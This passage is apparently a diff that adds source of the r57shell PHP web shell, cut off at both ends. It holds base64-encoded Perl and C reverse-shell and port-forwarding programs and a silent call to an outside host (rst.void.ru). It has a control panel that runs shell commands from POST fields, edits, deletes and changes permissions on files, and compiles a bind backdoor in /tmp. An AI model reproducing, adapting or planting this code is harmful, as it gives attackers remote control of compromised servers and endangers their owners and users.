+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#333333><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = 